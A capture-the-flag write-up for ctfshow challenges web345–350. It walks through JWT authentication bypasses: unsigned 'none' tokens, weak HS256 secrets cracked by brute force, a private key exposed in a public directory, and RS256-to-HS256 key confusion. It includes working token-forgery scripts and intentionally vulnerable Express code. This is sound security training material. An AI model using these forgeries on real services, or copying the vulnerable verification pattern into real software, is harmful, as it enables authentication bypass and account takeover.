ctfshow - web345-350 - jwt
All challenges belong to ctfshow and are their copyright! If this infringes, contact me and it will be removed immediately.
web345
my thought
After reading the source I visited /admin and found nothing there.
Look at the auth cookie instead. Original value:
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2NTIyMzcxMjgsImV4cCI6MTY1MjI0NDMyOCwibmJmIjoxNjUyMjM3MTI4LCJzdWIiOiJ1c2VyIiwianRpIjoiNDJmYWQ1NzlhNzEzZTE1NjczNzQ2Yzc5MTBkM2MzMmEifV0
->
Same cookie with sub changed from user to admin:
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2NTIyMzcxMjgsImV4cCI6MTY1MjI0NDMyOCwibmJmIjoxNjUyMjM3MTI4LCJzdWIiOiJhZG1pbiIsImp0aSI6IjQyZmFkNTc5YTcxM2UxNTY3Mzc0NmM3OTEwZDNjMzJhIn1d
The same payload reduced to just the sub claim:
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoiYWRtaW4ifV0
The header says alg "None" and the token has no signature part at all, so the server never checks anything: edit the cookie directly and visit /admin/.
web346 - changing the signature algorithm
Challenge
This challenge's cookie is signed with HS256:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY1MzIwODQ5MywiZXhwIjoxNjUzMjE1NjkzLCJuYmYiOjE2NTMyMDg0OTMsInN1YiI6InVzZXIiLCJqdGkiOiIzNjE5NjFhNjM0YTU3MzJhYTUzMmYyZmU5MDhmYmE0MiJ9.K8EAszlFstvCfSdR_Q9-qwX8nBBpa366Q7VCyvEKAec
right way
First attempt: change the algorithm in the header to none and generate a cookie with PyJWT:
import jwt

# A JSON Web Token has two parts we control here: the payload (claims) and the header.
# payload
token_dict = {
    "iss": "admin",
    "iat": 1653273637,
    "exp": 1653280837,
    "nbf": 1653273637,
    "sub": "admin",
    "jti": "8219ad40fe3524c013409606c9d9ecfc"
}
headers = {
    "alg": "none",
    "typ": "JWT"
}
jwt_token = jwt.encode(token_dict,      # payload (claims)
                       "",              # signing key; must be empty for alg "none"
                       algorithm="none",  # signing algorithm (PyJWT's default is HS256)
                       headers=headers)
print(jwt_token)
Setting the cookie to this token did not work: this server does not accept an unsigned token.
The real weakness is the secret, which is 123456; with that, a new cookie can be produced at jwt.io.
web347
Challenge
Same as above.
web348 - brute force
Challenge
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY1MzI3NTY1NCwiZXhwIjoxNjUzMjgyODU0LCJuYmYiOjE2NTMyNzU2NTQsInN1YiI6InVzZXIiLCJqdGkiOiJhOWY4ZGRlNzBjNDdlNWM1N2YxYWI3OTRlMTliNzkwOSJ9.2S40MftC-VtFmAOhkCDxkUkc4ktvt8YRkoDFv1nwElQ
my thought
Run c-jwt-cracker against the token.
The secret is aaab; generate a new cookie at jwt.io.
web349 - RSA public/private key leak
Challenge
app.js
// Requires and export as in the standard express-generator layout (assumed; the
// challenge excerpt starts at the route definitions).
var express = require('express');
var router = express.Router();
var fs = require('fs');
var jwt = require('jsonwebtoken');

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  // the private key is read from the public directory, which is also served as static content
  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
  res.cookie('auth',token);
  res.end('where is flag?');
});

router.post('/',function(req,res,next){
  var flag="flag_here";
  res.type('html');
  var auth = req.cookies.auth;
  var cert = fs.readFileSync(process.cwd()+'//public/public.key'); // get public key
  // no algorithms option: the token header decides which algorithm is used (see web350)
  jwt.verify(auth, cert, function(err, decoded) {
    if(decoded.user==='admin'){
      res.end(flag);
    }else{
      res.end('you are not admin');
    }
  });
});

module.exports = router;
right way
The code shows that both public.key and private.key live in the public directory, so I guessed they could be fetched directly over HTTP.
Both keys were indeed exposed, so the private key can sign a token with user: admin.
payload
node
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)
python2
import jwt

# run with python2
private_key = open('private.key', 'r').read()   # the leaked private key
payload = {"user": "admin"}
print(jwt.encode(payload, key=private_key, algorithm='RS256'))

jwt.io should also work, but when I tried it the server rejected the token.
web350 - key confusion attack
Challenge
This challenge ships the environment; routes/index.js only contains the public key, and the private key is not exposed.
right way
Change RS256 to HS256: the server verifies with whatever algorithm the header names and passes public.key as the key, so with HS256 the public key becomes the HMAC secret, and the public key is known.
payload
const jwt = require('jsonwebtoken');
var fs = require('fs');
// the public key is used as the HMAC secret; the server will do the same when it sees alg HS256
var publicKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, publicKey, { algorithm: 'HS256' });
console.log(token)
Defense
The JWT configuration should allow either HMAC algorithms or public-key algorithms, never both at the same time. - by Y4tacker
References
https://blog.csdn.net/solitudi/article/details/112525267
https://blog.csdn.net/cosmoslin/article/details/120540470